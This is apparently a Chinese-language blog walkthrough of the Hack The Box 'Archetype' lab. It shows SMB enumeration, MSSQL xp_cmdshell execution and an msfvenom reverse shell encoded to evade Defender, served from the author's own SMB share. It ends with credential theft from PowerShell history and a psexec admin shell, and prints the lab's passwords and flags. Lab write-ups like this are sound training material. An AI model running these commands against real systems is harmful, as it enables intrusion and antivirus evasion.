[Day21] HTB Archetype
是的!我买ㄌ Hack The Box 的 VIP+,因为我觉得 Try Hack Me 上面的 Windows 题目都太新手不友善了,相较之下, Hack The Box 的 Windows 题目比较多元,所以今天开始我应该都会来玩 Hack The Box 的题目! 官方说这题是 Very Easy,但我个人却觉得有一点小难QQ。
- URL : https://app.hackthebox.eu/machines/287
- IP : 10.10.10.27
扫 Port
-
rustscan -a 10.10.10.27 -r 1-65535 -
- nmap 继续扫
-
nmap -A -p135,139,445,5985,47001,49664,49665,49666,49667,49669,49668 10.10.10.27-
- 一堆的 RPC
- SMB
- 1433 是 MSSQL
-
-
SMB
-
SMB 匿名登入
-
- 发现
backups
-
-
backups 资料夹
-
- 一个 Config 载下来
-
-
-
取得密码资讯
-
- Host Name :
ARCHETYPE - User ID :
sql_svc - Password :
M3g4c0rp123
-
MSSQL
- 安装 impacket
-
sudo apt install python3-impacket
-
-
impacket-mssqlclient -p 1433 [email protected] -windows-auth -
- MSSQL 取得 Shell 就有机会可以 RCE
-
exec xp_cmdshell '{指令}'
-
-
systeminfo -
-
dir-
exec xp_cmdshell 'dir'
-
- 透过开启本地 smb
-
impacket-smbserver meow .
-
- 准备 Reverse shell
-
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.16.16 LPORT=7877 -e x86/shikata_ga_nai -f exe > shell.exe- 经测试,不挂
x86/shikata_ga_nai就会被 Defender 吃掉 - Windows 的 Reverse Shell 通常都会使用 msfvenom 来产
- 经测试,不挂
-
Shell
- 执行 Shell
-
exec xp_cmdshell '\\10.10.16.16\meow\shell.exe' -
-
- 收回 Reverse shell
-
- 取得 User Flag
-
-
3e7b102e78218e935bf3f4951fec21a3
-
尝试提权
- 试着使用 Windows exploit suggester
-
windows-exploit-suggester.py- 坏ㄌ QQ 不支援 2019
-
- WESNG
-
whoami /priv-
- 发现有 SeImpersonatePrivilege
-
- SeImpersonatePrivilege 提权尝试
正式提权
- Powershell history
-
%userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt
-
- Get Username and password
-
- Username :
administrator - Password :
MEGACORP_4dm1n!!
-
- Use psexec to get shell
impacket-psexec administrator:'MEGACORP_4dm1n!!'@10.10.10.27 -
- Get root flag
-
-
b91ccec3305e98240082d4474b848528
-
<<: 【Day 21】- 你的爬虫还在用帐号密码进行登入? 带上 Session 吧!(实战 Selenium 自动点击 Instagram 好友贴文赞 1/2)
【day26】Span翻转TextView
好的,连假最後一天,我们来个小篇章,就是Span啦,Span可以做到的事情有很多,如 *更改特定位...
Day 03 - 命名的规则
如果有错误,欢迎留言指教~ Q_Q 好的命名,也能够清楚的让人一看就知道是在做什麽 团队有统一的写...
[Day09] 第九章-Laravel 操作心得及资料来源补充
前言 经过昨天一连串得技术 跟程序轰炸 今天想分享一些使用laravel的心得 并且总结昨天的技术 ...
[Day17] 注册API – 测试阶段之输入基本资料
hello~~~ 夥伴们大家好,经过昨天我简单的介绍,希望有让夥伴们对Postman介面上的各个区块...
Day 27 介绍 gulp
插播一下, webpack 5 出来了 gulp 是个老牌的 task runner ,它就只是执...